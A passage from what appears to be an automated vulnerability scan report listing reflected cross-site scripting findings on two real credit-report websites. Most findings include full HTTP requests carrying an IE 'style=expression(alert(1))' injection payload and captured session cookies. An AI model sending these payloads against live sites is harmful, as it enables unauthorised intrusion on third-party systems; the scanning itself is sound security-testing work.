Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=10024463644'style%3d'x%3aexpression(alert(1))'dec35c3a558&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:56:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=10024463644'style='x:expression(alert(1))'dec35c3a558&sc=668032&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UE93D705F].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22&amp;pkgid=X2THZ&amp;SiteVersionID=693&amp;SiteID=10024463644'style='x:expression(alert(1))'dec35c3a558&amp;sc=668032&amp;bcd=TotalCompare'>
...[SNIP]...

6.440. http://www.creditchecktotal.com/Order1.aspx [SiteVersionID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The value of the SiteVersionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f218e'style%3d'x%3aexpression(alert(1))'669a81f7bb9 was submitted in the SiteVersionID parameter. This input was echoed as f218e'style='x:expression(alert(1))'669a81f7bb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693f218e'style%3d'x%3aexpression(alert(1))'669a81f7bb9&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:53:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693f218e'style='x:expression(alert(1))'669a81f7bb9&SiteID=100244&sc=668032&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U803072D0].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22&amp;pkgid=X2THZ&amp;SiteVersionID=693f218e'style='x:expression(alert(1))'669a81f7bb9&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare'>
...[SNIP]...

6.441. http://www.creditchecktotal.com/Order1.aspx [areaid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The value of the areaid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload defca'style%3d'x%3aexpression(alert(1))'ed3c0713e1c was submitted in the areaid parameter. This input was echoed as defca'style='x:expression(alert(1))'ed3c0713e1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22defca'style%3d'x%3aexpression(alert(1))'ed3c0713e1c&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:46:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22defca'style='x:expression(alert(1))'ed3c0713e1c&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UA137954C].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22defca'style='x:expression(alert(1))'ed3c0713e1c&amp;pkgid=X2THZ&amp;SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare'>
...[SNIP]...

6.442. http://www.creditchecktotal.com/Order1.aspx [bcd parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The value of the bcd request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e37ca'style%3d'x%3aexpression(alert(1))'ec7a0f632fe was submitted in the bcd parameter. This input was echoed as e37ca'style='x:expression(alert(1))'ec7a0f632fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalComparee37ca'style%3d'x%3aexpression(alert(1))'ec7a0f632fe HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 21:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalComparee37ca'style='x:expression(alert(1))'ec7a0f632fe
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UB71CCEBB].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22&amp;pkgid=X2THZ&amp;SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalComparee37ca'style='x:expression(alert(1))'ec7a0f632fe'>
...[SNIP]...

6.443. http://www.creditchecktotal.com/Order1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 569e4'style%3d'x%3aexpression(alert(1))'95931430212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 569e4'style='x:expression(alert(1))'95931430212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare&569e4'style%3d'x%3aexpression(alert(1))'95931430212=1 HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 21:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare&569e4'style='x:expression(alert(1))'95931430212=1
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U92331B5A].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22&amp;pkgid=X2THZ&amp;SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare&amp;569e4'style='x:expression(alert(1))'95931430212=1'>
...[SNIP]...

6.444. http://www.creditchecktotal.com/Order1.aspx [pkgid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The value of the pkgid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70fe4'style%3d'x%3aexpression(alert(1))'011471bdd11 was submitted in the pkgid parameter. This input was echoed as 70fe4'style='x:expression(alert(1))'011471bdd11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ70fe4'style%3d'x%3aexpression(alert(1))'011471bdd11&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:47:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ70fe4'style='x:expression(alert(1))'011471bdd11&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U83584E01].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22&amp;pkgid=X2THZ70fe4'style='x:expression(alert(1))'011471bdd11&amp;SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare'>
...[SNIP]...

6.445. http://www.creditchecktotal.com/Order1.aspx [sc parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5635'style%3d'x%3aexpression(alert(1))'b5f84f1ce0 was submitted in the sc parameter. This input was echoed as a5635'style='x:expression(alert(1))'b5f84f1ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032a5635'style%3d'x%3aexpression(alert(1))'b5f84f1ce0&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default; LastVisitDate=4/24/2011 1:45:15 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:59:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032a5635'style='x:expression(alert(1))'b5f84f1ce0&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U71504137].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Order1.aspx?areaid=22&amp;pkgid=X2THZ&amp;SiteVersionID=693&amp;SiteID=100244&amp;sc=668032a5635'style='x:expression(alert(1))'b5f84f1ce0&amp;bcd=TotalCompare'>
...[SNIP]...

6.446. http://www.creditreport.com/dni/Order1.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1efdb'a%3d'b'7201941a490 was submitted in the REST URL parameter 1. This input was echoed as 1efdb'a='b'7201941a490 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni1efdb'a%3d'b'7201941a490/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:29:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni1efdb'a='b'7201941a490/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UA5063647].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni1efdb'a='b'7201941a490/Order1.aspx?areaid=22&amp;pkgid=C2TDM&amp;SiteVersionID=967&amp;SiteID=100332&amp;sc=671917&amp;bcd=comptst'>
...[SNIP]...

6.447. http://www.creditreport.com/dni/Order1.aspx [SiteID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of the SiteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cfc7'style%3d'x%3aexpression(alert(1))'cc28121e3c2 was submitted in the SiteID parameter. This input was echoed as 7cfc7'style='x:expression(alert(1))'cc28121e3c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=1003327cfc7'style%3d'x%3aexpression(alert(1))'cc28121e3c2&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
